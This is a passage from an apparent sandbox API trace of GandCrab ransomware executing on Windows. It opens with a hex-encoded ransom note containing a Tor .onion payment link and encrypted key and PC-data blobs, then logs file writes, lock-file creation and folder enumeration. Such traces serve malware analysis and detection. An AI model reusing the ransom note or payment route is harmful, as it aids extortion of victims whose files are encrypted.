66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.796] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0079.796] CloseHandle (hObject=0x2bc) returned 1 [0079.797] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.797] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.797] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x6c)) [0079.797] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.798] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.798] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.798] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock") returned 77 [0079.798] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\word\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0079.798] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.799] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.799] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\") returned 53 [0079.799] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*" [0079.799] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x5037f8 [0079.799] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.799] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.799] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.799] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.799] FindNextFileW (in: hFindFile=0x5037f8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.799] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0079.799] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0079.799] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Word\\d2ca4a09d2ca4deb61a.lock" [0079.799] lstrlenW 